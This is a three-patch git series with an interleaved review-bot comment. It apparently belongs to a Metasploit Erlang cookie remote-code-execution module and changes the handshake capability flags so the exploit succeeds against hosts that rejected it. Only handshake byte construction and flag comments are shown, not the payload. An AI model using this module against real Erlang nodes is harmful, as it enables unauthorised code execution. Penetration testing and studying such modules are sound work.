From 5742e1c20ea2561ed3265ede6cb7d5f7138864c7 Mon Sep 17 00:00:00 2001 From: Mike Brown Date: Wed, 1 Sep 2021 10:45:41 -0700 Subject: [PATCH 1/3] Add DFLAG_BIG_CREATION to capability flags I have been having trouble with this module (and other projects) using the included set of capability flags (0x3499c) on a specific host. I took some time to analyze the problem and it appears to be with the included flag set. In my case (and I suspect others'), the target node was rejecting the client with "not_allowed". After testing I found that simply adding DFLAG_BIG_CREATION (0x40000) allowed this exploit to work, both on the host I was having trouble with, and an older one where this (unmodified) exploit was working. Breakdown of flags is below. ``` 0x0007499c == 0b0000 0000 0111 0100 1001 1001 1100 | ||| | | | | | ||-- DFLAG_EXTENDED_REFERENCES | ||| | | | | | |-- DFLAG_DIST_MONITOR | ||| | | | | |-- DFLAG_FUN_TAGS | ||| | | | |-- DFLAG_NEW_FUN_TAGS | ||| | | |-- DFLAG_EXTENDED_PIDS_PORTS | ||| | |-- DFLAG_NEW_FLOATS | ||| |-- DFLAG_SMALL_ATOM_TAGS | |||-- DFLAG__UTF8_ATOMS | ||-- DFLAG_MAP_TAG | |-- **DFLAG_BIG_CREATION** |-- DFLAG_HANDSHAKE_23 ``` --- modules/exploits/multi/misc/erlang_cookie_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/misc/erlang_cookie_rce.rb b/modules/exploits/multi/misc/erlang_cookie_rce.rb index 48d1b64ed013..20393314674b 100644 --- a/modules/exploits/multi/misc/erlang_cookie_rce.rb +++ b/modules/exploits/multi/misc/erlang_cookie_rce.rb @@ -141,7 +141,7 @@ def exploit send_name << [(@our_node.length+7).to_s(16)].pack('H*') # send_name << "\x6e" # Tag: n send_name << "\x00\x05" # Version: R6 (5) - send_name << "\x00\x03\x49\x9c" # Flags (0x0003499c) + send_name << "\x00\x07\x49\x9c" # Flags (0x0003499c) send_name << "#{@our_node}" # @ # SEND_CHALLENGE_REPLY: return generated digest and its own challenge From 2bfc8d35d0954b7cea71514f5d10c6aa1ba9bc17 Mon Sep 17 00:00:00 2001 
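Review bot: The new flag word on the `+` line is still a hand-assembled byte string whose trailing comment must be kept in step by hand, and in this hunk it is not (the bytes now encode 0x0007499c while the comment still reads 0x0003499c; PATCH 2/3 in this series corrects the comment text but not the root cause). Deriving the bytes from one integer removes the drift: a class-level `DIST_FLAGS = 0x0007499c` and `send_name << [DIST_FLAGS].pack('N') # Flags (0x0007499c)` yield the same four big-endian bytes. The ten-line flag list that PATCH 2/3 adds below this line then becomes the natural definition of that constant (the OR of the named DFLAG_* values it lists) instead of a comment whose sum a reader has to re-verify. The enclosing `exploit` method begins before this hunk.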
From: Mike Brown Date: Sat, 4 Sep 2021 14:32:30 -0700 Subject: [PATCH 2/3] Defined capability flags in comment Added descriptive comment for included capability flags. --- modules/exploits/multi/misc/erlang_cookie_rce.rb | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/modules/exploits/multi/misc/erlang_cookie_rce.rb b/modules/exploits/multi/misc/erlang_cookie_rce.rb index 20393314674b..cf42a8c66da0 100644 --- a/modules/exploits/multi/misc/erlang_cookie_rce.rb +++ b/modules/exploits/multi/misc/erlang_cookie_rce.rb @@ -141,7 +141,17 @@ def exploit send_name << [(@our_node.length+7).to_s(16)].pack('H*') # send_name << "\x6e" # Tag: n send_name << "\x00\x05" # Version: R6 (5) - send_name << "\x00\x07\x49\x9c" # Flags (0x0003499c) + send_name << "\x00\x07\x49\x9c" # Flags (0x0007499c) + # DFLAG_EXTENDED_REFERENCES (0x4) + # DFLAG_DIST_MONITOR (0x8) + # DFLAG_FUN_TAGS (0x10) + # DFLAG_NEW_FUN_TAGS. (0x80) + # DFLAG_EXTENDED_PIDS_PORTS (0x100) + # DFLAG_NEW_FLOATS (0x800) + # DFLAG_SMALL_ATOM_TAGS (0x4000) + # DFLAG_UTF8_ATOMS (0x10000) + # DFLAG_MAP_TAG (0x20000) + # DFLAG_BIG_CREATION (0x40000) send_name << "#{@our_node}" # @ # SEND_CHALLENGE_REPLY: return generated digest and its own challenge From 28e358066b2c252f3dada67a1bdf3f0d16ce1ecf Mon Sep 17 00:00:00 2001 From: Mike Brown Date: Sat, 4 Sep 2021 14:34:05 -0700 Subject: [PATCH 3/3] Fixed typo Extraneous `.`. Thanks, macOS! --- modules/exploits/multi/misc/erlang_cookie_rce.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/misc/erlang_cookie_rce.rb b/modules/exploits/multi/misc/erlang_cookie_rce.rb index cf42a8c66da0..56ba8abaabf4 100644 --- a/modules/exploits/multi/misc/erlang_cookie_rce.rb +++ b/modules/exploits/multi/misc/erlang_cookie_rce.rb 
@@ -145,7 +145,7 @@ def exploit
 # DFLAG_EXTENDED_REFERENCES (0x4)
 # DFLAG_DIST_MONITOR (0x8)
 # DFLAG_FUN_TAGS (0x10)
- # DFLAG_NEW_FUN_TAGS. (0x80)
+ # DFLAG_NEW_FUN_TAGS (0x80)
 # DFLAG_EXTENDED_PIDS_PORTS (0x100)
 # DFLAG_NEW_FLOATS (0x800)
 # DFLAG_SMALL_ATOM_TAGS (0x4000)